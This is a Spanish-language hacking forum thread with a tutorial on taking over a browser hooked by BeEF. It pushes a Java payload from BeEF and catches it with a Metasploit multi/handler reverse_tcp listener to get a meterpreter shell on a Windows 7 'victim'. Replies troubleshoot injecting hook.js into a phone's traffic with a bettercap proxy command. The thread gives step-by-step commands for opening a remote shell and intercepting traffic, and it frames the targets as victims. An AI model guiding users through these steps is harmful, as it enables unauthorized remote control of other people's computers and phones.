Sesión de meterpreter con BeEF y metasploit (exploit java)

Iniciado por Lonewolf, Octubre 13, 2016, 10:52:33 AM

Tema anterior - Siguiente tema

0 Miembros y 1 Visitante están viendo este tema.

Octubre 13, 2016, 10:52:33 AM Ultima modificación: Octubre 13, 2016, 12:16:54 PM por HATI
Hola, en la entrada de hoy continuaremos con la entrada enterior en la que les prometi que obtendriamos nuestra estupida y sensual sesion de meterpreter , para que entiendan mejor les recomiendo leer la entrada anterior : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta.

Bueno , en este caso vamos a obtener nuestra shell mediande un payload para java que BeEF trae en sus opciones de post-explotación que cabe recalcar que no son pocas  :o .

En la entrada anterior habíamos logrado infectar un navegador de un dispositivo android , en este caso el navegador infectado estara corriendonen una maquina con Maicrosó Guindous 7 ( Windows 7 ... lo se mis chistes son malos, no me dejen  :'( ) . Pero no se asusten el procedimiento de infección es exactamente el mismo.
Comenzemos desde un punto en el que tenemos un navegador infectado con BeEF:




Ok, veamos que podemos hacer.




Antes de seguir tenemos que entender que significan los puntos de colores que tenemos adjuntados a cada opcion:

  • Verde: El objetivo es vulnerable y el ataque no sera persivido por la victima.
  • Naranja: El objetivo es vulnerable pero su ejecución sera advertida por el usuario.
  • Gris: No esta comprobado que la victima sea vulnerable.
  • Rojo: La victima no es vulnerable.



Para ejecutar El modulo solo es nesesario darle click y configurar los parametros que tendremos en la parte derecha de la ventana.
Luego de configurar nuestro payload en BeEF vamos a abrir una nueva terminal , vamos a ejecutar metasploit y poner un handler en escucha:


  • Iniciar metasploit: "msfconsole"
  • Seleccionar nuestro exploit: "use exploit/multi/handler"
  • Configurar nuestro Payload: "set PAYLOAD java/meterpreter/reverse_tcp"
  • Colocar nuestra ip en escucha: "set LHOST 192.168.0.104 (esto puede variar según cada caso)"
  • Colocar un puerto en escucha: "set LPORT 6666" Pueden usar cualquier puerto que no este en uso.



Obiamente tenemos que colocar los mismos datos que con los que configuramos el modulo java en BeEF




Ahora colocamos el handler en escucha con el comando "exploit" o "run"




Seguidamente por el lado de BeEF lanzamos el modulo que teniamos configurado y tendriamos que obtener nuestra estupida y sensual sesión de meterpreter .




Me despido hasta la proxima entrada.



Fuente: "No tienes permitido ver los links. Registrarse o Entrar a mi cuenta"



"Todos tenemos un defecto , un error en nuestro código "

Todavia no pude infectar mi propio celular con el bettercap del otro post. Esta bien configurado todo, es como que mi celular se queda sin internet, no logra conectar a las paginas. Por ende no lo puedo infectar, porque no logra conectar al hook del beef.
Si entro directamente si, pero eso es otro tema.
Hoy cuando llego a casa, pruebo hacer lo del meterpreter nuevamente, viste que podes integrar todo el metasploit en el beef no? - Y creo que tambien el armitage/cobalt strike-
Pikaa~


Octubre 13, 2016, 11:17:32 AM #2 Ultima modificación: Octubre 13, 2016, 11:19:27 AM por Lonewolf
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
Todavia no pude infectar mi propio celular con el bettercap del otro post. Esta bien configurado todo, es como que mi celular se queda sin internet, no logra conectar a las paginas. Por ende no lo puedo infectar, porque no logra conectar al hook del beef.
Si entro directamente si, pero eso es otro tema.
Hoy cuando llego a casa, pruebo hacer lo del meterpreter nuevamente, viste que podes integrar todo el metasploit en el beef no? - Y creo que tambien el armitage/cobalt strike-
Hola Pakachu , no le he probado con cobalt strike pero vi en algun post perdido por ahi que si se puede jaja , y por lo general si se puede con metasploit tambiense podra con armitage ya que solo es un entorno grafico para dicho framework , lo que me dices sobre tu problema con tu android si es que estas haciendo todo correctamente se me ocurren 2 posibles causas :
1- Si entras a alguna pagina con HSTS (https) podria que dicho protocolo no te deje interceptar el trafico e inyectar el hook.js , para solucionarlo podrias probar con una pagina http como con la que probe en el post .
2- Existe la probabilidad se que el ancho de banda de tu pc este un poco sobrecargado y por eso podria ser que el celular no te este dando internet correctamente , podrias probar si bettercap finciona simplemente con "bettercap -T ipvictima --proxy" la verdad que no se me ocurre nada mas , saludos
"Todos tenemos un defecto , un error en nuestro código "

Octubre 13, 2016, 12:40:31 PM #3 Ultima modificación: Octubre 13, 2016, 12:45:53 PM por puntoCL
@No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

esto lo que tu estabas buscando?






Exactamente eso, no habia tenido tiempo en buscarlo. Gracias .cl (:
Pikaa~